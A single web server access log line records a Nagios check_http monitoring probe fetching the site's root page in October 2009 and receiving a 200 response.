209.59.12.99 - - [28/Oct/2009:05:57:39 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
